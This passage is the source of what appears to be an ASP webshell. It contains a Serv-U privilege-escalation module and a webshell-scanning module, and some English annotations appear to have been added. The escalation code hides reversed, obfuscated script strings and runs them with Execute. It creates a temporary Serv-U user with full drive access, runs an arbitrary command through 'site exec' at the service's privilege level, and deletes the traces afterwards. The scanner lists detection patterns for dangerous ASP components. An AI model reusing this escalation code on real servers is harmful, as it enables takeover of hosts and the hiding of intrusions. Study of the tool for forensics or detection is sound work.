& vbCrLf & "-ChangePassword=0" & vbCrLf & _ "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _ "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _ "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _ "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf quit = "QUIT" & vbCrLf newuser=replace(newuser,"c:",f)
' SUaction selects the step; steps 1-3 chain to each other through an auto-submitting form.
' Step 1 (reversed body, continued on the next line of the file) sends the login and the
' domain/user definitions to the local Serv-U port through Microsoft.XMLHTTP.
select case SUaction case 1 ShiSan="╋╋╁>tpircs/<╁SRR╋╁;)0004,';)(timbus.nusdlog.lla.tnemucod'(tuoemiTtes╁SRR╋╁;)'>retnec<...╁&ssap&╁:令口,╁&resu&╁ :名户用用使,╁&trop&╁:1.0.0.721 接连在正>retnec<'(etirw.tnemucod╁SRR╋╁>'tpircsavaj'=egaugnal 
tpircs<╁SRR╋╁>mrof/<>'2'=eulav 'noitcaUS'=di 'neddih'=epyt 'noitcaUS'=eman tupni<╁SRR╋╁>'05'=ezis '╁&f&╁'=eulav 'f'=di 'neddih'=epyt 'f'=eman tupni<╁SRR╋╁>'05'=ezis '╁&dmc&╁'=eulav 'c'=di 'neddih'=epyt 'c'=eman tupni<╁SRR╋╁>dt/<>'╁&trop&╁'=eulav 'trop'=di 'neddih'=epyt 'trop'=eman tupni<╁SRR╋╁>dt/<>'╁&ssap&╁'=eulav 'p'=di 'neddih'=epyt 'p'=eman tupni<╁SRR╋╁>dt/<>'╁&resu&╁'=eulav 'u'=di 'neddih'=epyt 'u'=eman tupni<╁SRR╋╁>'nusdlog'=eman 'tsop'=dohtem mrof<╁SRR╋a=)╁a╁(noisses tes╋tiuq & resuwen & niamodwen & niamodled & tm & ssapnigol & resunigol dnes.a╋╁╁ ,╁╁ ,eurT,╁1s/nimdapu/nusdlog/╁ & trop & ╁:1.0.0.721//:ptth╁ ,╁TEG╁ nepo.a╋)╁PTTHLMX.tfosorciM╁(tcejbOetaerC.revreS=a tes" ExeCuTe(ShiSanFun(ShiSan))
' Step 2 of the "Servu" branch (SUaction = 2). The reversed body connects through Microsoft.XMLHTTP
' to 127.0.0.1 on ftpport, logs in as the temporary user go / od created in step 1 and submits the
' requested command with "site exec", so the command runs with the Serv-U service's privileges
' rather than the web worker's. It then emits a form that auto-submits to step 3.
case 2 ShiSan="╋╋╁>tpircs/<╁SRR╋╁;)0004,╁╁;)(timbus.nusdlog.lla.tnemucod╁╁(tuoemiTtes╁SRR╋╁;)'>retnec<,...待等请,限权升提在正>retnec<'(etirw.tnemucod╁SRR╋╁>'tpircsavaj'=egaugnal tpircs<╁SRR╋╁>mrof/<>'3'=eulav 'noitcaUS'=di 'neddih'=epyt 'noitcaUS'=eman tupni<╁SRR╋╁>'05'=ezis '╁&f&╁'=eulav 'f'=di 'neddih'=epyt 'f'=eman tupni<╁SRR╋╁>'05'=ezis '╁&dmc&╁'=eulav 'c'=di 'neddih'=epyt 'c'=eman tupni<╁SRR╋╁>dt/<>'╁&trop&╁'=eulav 'trop'=di 'neddih'=epyt 'trop'=eman tupni<╁SRR╋╁>dt/<>'╁&ssap&╁'=eulav 'p'=di 'neddih'=epyt 'p'=eman tupni<╁SRR╋╁>dt/<>'╁&resu&╁'=eulav 'u'=di 'neddih'=epyt 'u'=eman tupni<╁SRR╋╁>'nusdlog'=eman 'tsop'=dohtem mrof<╁SRR╋b=)╁b╁(noisses tes ╋tiuq & fLrCbv & dmc & ╁ cexe etis╁ & fLrCbv & ╁do ssap╁ & fLrCbv & ╁og resU╁ dnes.b╋╁╁ ,╁╁ ,eurT ,╁2s/nimdapu/nusdlog/╁ & tropptf & ╁:1.0.0.721//:ptth╁ ,╁TEG╁ nepo.b╋)╁PTTHLMX.tfosorciM╁(tcejbOetaerC.revreS=b tes" ExeCuTe(ShiSanFun(ShiSan))
' Step 3 (SUaction = 3): cleanup. The reversed body logs in again with the supplied administrator
' credentials and sends the delete-domain command, removing the temporary domain, then reports that
' the command was executed.
' Forensics note: because the domain is deleted afterwards, it will normally not be present in the
' Serv-U configuration after the fact; rely on Serv-U and process-creation logs instead.
case 3 ShiSan="╋╋╁>retnec/<╁SRR╋╁>╁╁;'uvreS=noitcA?'=ferh.noitacol╁╁=kcilCno ' 续继回返 '=eulav nottub=epyt tupni<╁SRR╋╁>rb<>rb<>tnof/<╁&dmc&╁>der=roloc tnof<>rb<:令命了行执已,毕完权提>retnec<╁SRR╋c=)╁c╁(noisses tes╋tiuq & niamodled & tm & ssapnigol & resunigol dnes.c╋╁╁ ,╁╁ ,eurT ,╁3s/nimdapu/nusdlog/╁ & trop & ╁:1.0.0.721//:ptth╁ ,╁TEG╁ nepo.c╋)╁PTTHLMX.tfosorciM╁(tcejbOetaerC.revreS=c tes" 
ExeCuTe(ShiSanFun(ShiSan))
' Any other SUaction value: abort and release the three XMLHTTP objects kept in the session by the
' steps above, then render the input form (its markup was stripped from this copy).
case else on error resume next set a=session("a") set b=session("b") set c=session("c") a.abort Set a = Nothing b.abort Set b = Nothing c.abort Set c = Nothing RRS"
" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS" " RRS" " RRS" " RRS" " RRS" " RRS" " RRS" " RRS" " RRS"
Serv-U 提升权限 ASP版 6.2
用户名:
口 令:
端 口:
系统路径:
命 令:
" RRS"" RRS"
" end select function Gpath() on error resume next err.clear set f=Server.CreateObject("Scripting.FileSystemObject") if err.number>0 then gpath="c:" exit function end if gpath=f.GetSpecialFolder(0) gpath=lcase(left(gpath,2)) set f=nothing end function Function RndNumber(Min,Max) Randomize RndNumber=Int((Max - Min + 1) * Rnd() + Min) End Function Case "kmuma" dim Report if request.QueryString("act")<>"scan" then RRS ("网站根目录- "&Server.MapPath("/")&"
") RRS ("本程序目录- "&Server.MapPath(".")) RRS "
" RRS "

填入你要检查的路径:" RRS " 填“\”网站根目录;“.”为本程序目录

" RRS "你要干什么: 查ASP " RRS "搜索符合条件之文件
" RRS "

" RRS "  查找内容:" RRS " 要查找的字符串,不填就只进行日期检查
" RRS "  修改日期: 多个日期用;隔开,任意日期填写 ALL
" RRS "  文件类型: 类型之间用,隔开,*表示所有类型

" RRS "" RRS "
" else if request.Form("path")="" then RRS("路径不能为空") response.End() end if if request.Form("path")="\" then TmpPath = Server.MapPath("\") elseif request.Form("path")="." then TmpPath = Server.MapPath(".") else TmpPath = request.Form("path") end if timer1 = timer Sun = 0 SumFiles = 0 SumFolders = 1 If request.Form("radiobutton") = "sws" Then DimFileExt = "asp,cer,asa,cdx" Call ShowAllFile(TmpPath) Else If request.Form("path") = "" or request.Form("Search_Date") = "" or request.Form("Search_FileExt") = "" Then RRS("缉捕条件不完全

请返回重新输入") response.End() End If DimFileExt = request.Form("Search_fileExt") Call ShowAllFile2(TmpPath) End If RRS "" RRS "" RRS "" Sun = Sun + 1 temp="-同上-" End if If instr( filetxt, Lcase("She"&DoMyBest&"ll.Application") ) or Instr( filetxt, Lcase("clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000") ) then Report = Report&"" Sun = Sun + 1 temp="-同上-" End If Set regEx = New RegExp regEx.IgnoreCase = True regEx.Global = True regEx.Pattern = "\bLANGUAGE\s*=\s*[""]?\s*(vbscript|jscript|javascript).encode\b" If regEx.Test(filetxt) Then Report = Report&"" Sun = Sun + 1 temp="-同上-" End If regEx.Pattern = "\bEv"&"al\b" If regEx.Test(filetxt) Then Report = Report&"" Sun = Sun + 1 temp="-同上-" End If regEx.Pattern = "[^.]\bExe"&"cute\b" If regEx.Test(filetxt) Then Report = Report&"" Sun = Sun + 1 temp="-同上-" End If regEx.Pattern = "\.(Open|Create)TextFile\b" If regEx.Test(filetxt) Then Report = Report&"" Sun = Sun + 1 temp="-同上-" End If regEx.Pattern = "\.SaveToFile\b" If regEx.Test(filetxt) Then Report = Report&"" Sun = Sun + 1 temp="-同上-" End If regEx.Pattern = "\.Save\b" If regEx.Test(filetxt) Then Report = Report&"" Sun = Sun + 1 temp="-同上-" End If Set regEx = Nothing Set regEx = New RegExp regEx.IgnoreCase = True regEx.Global = True regEx.Pattern = "
Scan WebShell -- 十三优化版
" RRS "
" RRS "扫描完毕!一共检查文件夹"&SumFolders&"个,文件"&SumFiles&"个,发现可疑点"&Sun&"个" RRS "" If request.Form("radiobutton") = "sws" Then RRS "" RRS "" RRS "" RRS "" else RRS "" RRS "" RRS "" end if RRS "" RRS Report RRS "
文件相对路径特征码描述创建/修改时间文件相对路径文件创建时间修改时间
" timer2 = timer thetime=cstr(int(((timer2-timer1)*10000 )+0.5)/10) RRS "
本页执行共用了"&thetime&"毫秒" end if Sub ShowAllFile(Path) Set F1SO = CreateObject("Scripting.FileSystemObject") if not F1SO.FolderExists(path) then exit sub Set f = F1SO.GetFolder(Path) Set fc2 = f.files For Each myfile in fc2 If CheckExt(F1SO.GetExtensionName(path&"\"&myfile.name)) Then Call ScanFile(Path&Temp&"\"&myfile.name, "") SumFiles = SumFiles + 1 End If Next Set fc = f.SubFolders For Each f1 in fc ShowAllFile path&"\"&f1.name SumFolders = SumFolders + 1 Next Set F1SO = Nothing End Sub Sub ScanFile(FilePath, InFile) Server.ScriptTimeout=999999999 If InFile <> "" Then Infiles = "该文件被"& InFile & "文件包含执行" End If Set FSO1s = CreateObject("Scripting.FileSystemObject") on error resume next set ofile = FSO1s.OpenTextFile(FilePath) filetxt = Lcase(ofile.readall()) If err Then Exit Sub end if if len(filetxt)>0 then filetxt = vbcrlf & filetxt temp = ""&replace(FilePath,server.MapPath("\")&"\","",1,1,1)&"
" temp=temp&"Edit " temp=temp&"Del " temp=temp&"Copy " temp=temp&"Move" If instr( filetxt, Lcase("WScr"&DoMyBest&"ipt.Shell") ) or Instr( filetxt, Lcase("clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8") ) then Report = Report&"
"&temp&"WScr"&DoMyBest&"ipt.Shell 或者 clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8危险组件,一般被ASP木利用"&infiles&""&GetDateCreate(filepath)&"
"&GetDateModify(filepath)&"
"&temp&"She"&DoMyBest&"ll.Application 或者 clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000危险组件,一般被ASP木利用"&infiles&""&GetDateCreate(filepath)&"
"&GetDateModify(filepath)&"
"&temp&"(vbscript|jscript|javascript).Encode似乎脚本被加密了"&infiles&""&GetDateCreate(filepath)&"
"&GetDateModify(filepath)&"
"&temp&"Ev"&"ale"&"val()函数可以执行任意ASP代码
但是javascript代码中也可以使用,有可能是误报。"&infiles&"
"&GetDateCreate(filepath)&"
"&GetDateModify(filepath)&"
"&temp&"Exec"&"utee"&"xecute()函数可以执行任意ASP代码
"&infiles&"
"&GetDateCreate(filepath)&"
"&GetDateModify(filepath)&"
"&temp&".CreateTextFile|.OpenTextFile使用了FSO的CreateTextFile|OpenTextFile读写文件"&infiles&""&GetDateCreate(filepath)&"
"&GetDateModify(filepath)&"
"&temp&".SaveToFile使用了Stream的SaveToFile函数写文件"&infiles&""&GetDateCreate(filepath)&"
"&GetDateModify(filepath)&"
"&temp&".Save使用了XMLHTTP的Save函数写文件"&infiles&""&GetDateCreate(filepath)&"
"&GetDateModify(filepath)&"